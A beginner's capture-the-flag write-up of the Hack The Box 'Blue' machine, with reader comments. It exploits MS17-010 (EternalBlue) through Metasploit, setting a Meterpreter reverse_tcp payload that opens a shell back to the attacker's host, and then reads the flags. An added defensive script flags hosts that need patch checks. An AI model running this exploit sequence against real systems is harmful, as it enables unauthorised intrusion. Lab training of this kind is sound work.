Hack The Box - Blue
DISCLAIMER: I am not an expert penetration tester.
For all thoughts, opinions, insights, tools, techniques, tactics, hashtags mentioned below, do verify with industry standard resources and references.
Methods below are for educational purposes and should not be used outside of a practice lab environment or without the express written consent and authorization of all parties involved.
This is my journey to develop as a pentester, internalize methodologies, and attempt to give back to the infosec community by teaching what I learn along the way.
Now, down to business.
Name: Blue
OS: Windows
Difficulty: Easy
Release: 28 Jul 2017
IP: 10.10.10.40
Hacker Status: Noob
The first box we are going to tackle deals with a well-known exploit and gives us a great example of a reverse shell.
To start, we run an Nmap scan against the virtual machine to discover open ports, identify running services, and enumerate the operating system.
'nmap -A -T4 10.10.10.40'
Right away, we're drawn to open port 445 (SMB); Nmap's script output identifies the targeted host OS as Windows 7 7601 SP 1.
After a quick Google search, we find that this specific OS is susceptible to an SMB remote code execution exploit called MS17-010 or more widely known as EternalBlue.
EternalBlue exploits a critical vulnerability in Microsoft's implementation of the Server Message Block (SMB) protocol. SMB provides shared access to resources between nodes on a network.
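From the defender's side, the same Nmap evidence (445/tcp open plus an smb-os-discovery OS string for an older Windows family) is what you would sweep a network for to queue hosts for MS17-010 patch verification. The script below is an added example, not part of the original post: it parses Nmap's -oX XML output and flags hosts matching that profile. The XML sample is constructed to mimic Nmap's format, and the OS pattern is an assumed heuristic.

```python
"""Triage nmap -oX output for hosts that match the Blue profile: SMB (445/tcp)
open on an older Windows family such as Windows 7, the MS17-010 (EternalBlue)
exposure the walkthrough above finds with `nmap -A`.  Added example, not from the
original post; the sample XML below is constructed to mimic nmap's -oX format."""
import re
import xml.etree.ElementTree as ET

# Constructed sample: one Windows 7 host with SMB open, one Windows 10 host, one filtered.
SAMPLE_NMAP_XML = """<nmaprun>
<host><address addr="10.10.10.40" addrtype="ipv4"/>
 <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
 <hostscript><script id="smb-os-discovery" output="OS: Windows 7 Professional 7601 Service Pack 1">
  <elem key="os">Windows 7 Professional 7601 Service Pack 1</elem></script></hostscript></host>
<host><address addr="10.10.10.41" addrtype="ipv4"/>
 <ports><port protocol="tcp" portid="445"><state state="open"/></port></ports>
 <hostscript><script id="smb-os-discovery" output="OS: Windows 10 Pro 19041">
  <elem key="os">Windows 10 Pro 19041</elem></script></hostscript></host>
<host><address addr="10.10.10.42" addrtype="ipv4"/>
 <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports></host>
</nmaprun>"""

# Assumption: this pattern is a triage heuristic focused on older families that are
# often found unpatched.  MS17-010 applied to every supported Windows version at the
# time, so widen it for your estate; a hit means "verify patch level", not "vulnerable".
MS17_010_OS_PATTERN = re.compile(r"Windows (7|Vista|Server 2008|XP|Server 2003)\b", re.I)

def smb_exposed_hosts(xml_text):
    """Return [(ip, os_string)] for hosts with 445/tcp open and an OS string
    matching MS17_010_OS_PATTERN, so they can be queued for patch verification."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        has_445 = any(
            p.get("portid") == "445" and p.find("state").get("state") == "open"
            for p in host.iter("port")
        )
        os_elem = host.find(".//script[@id='smb-os-discovery']/elem[@key='os']")
        os_name = os_elem.text if os_elem is not None else ""
        if has_445 and MS17_010_OS_PATTERN.search(os_name):
            findings.append((addr.get("addr"), os_name))
    return findings

if __name__ == "__main__":
    for ip, os_name in smb_exposed_hosts(SAMPLE_NMAP_XML):
        print(f"{ip}: {os_name} -> check MS17-010 patch status / disable SMBv1")
```

Run it against a real scan with `nmap -sV --script smb-os-discovery -p445 -oX scan.xml <range>` and pass the file contents to `smb_exposed_hosts`.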
Now that we have identified an exploit for our target machine's OS, we can search 'MS17-010' in Metasploit and select the corresponding exploit for our target machine's OS.
We then type the command:
'use [exploit name]'
into the Metasploit command terminal and view the options available for this exploit.
We input Module Options commands as follows:
'set RHOST [target IP]'
'set LHOST [host IP]'
'set LPORT [port #]'
'set payload windows/x64/meterpreter/reverse_tcp'
Then type 'show options' to validate the changes.
Type the 'run' command to launch the exploit.
You can see from the 'WIN' output that the exploit executed successfully and a reverse TCP Meterpreter shell was opened on your host machine.
Type 'sysinfo' followed by 'getuid' to validate the Meterpreter command shell is associated with our target machine.
Use the 'shell' command to drop into a Windows command prompt. Change to the root directory with the 'cd \..\..' command and view the contents of the root directory with the 'dir' command.
This is Hack The Box, so let's grab the first User flag by changing to the Users\haris\Desktop directory, validating contents in directory using 'dir' and then printing out file contents using 'type user.txt'.
As we can see from the command output, the flag is a 32-character MD5 hash, which is the typical format used for Hack The Box machine flags.
Now, let's grab the Root flag by changing to the Users\Administrator\Desktop directory, validating contents in directory using 'dir' and then printing out file contents using 'type root.txt'.
Voila! We can see from the output of the command that the 'root.txt' file contains the MD5 hash for the Administrator (Root).
Do note that Blue is a retired box and all associated flags carry no points, just practice :)
That's it!
Not the most challenging box, but a good first HTB challenge to get under our belts and understand what a successful root looks like.
As we progress, our goal is to become more manual in our enumeration and testing, and rely less on robust tools for exploitation.
Prost!
Interested in actively following along? Check out the Hack The Box invite code challenge :)
My first one was OpenAdmin then the Traverxec! They are Linux boxes, fairly simple!!!
Nice! Well written as well :)
Love it Micah!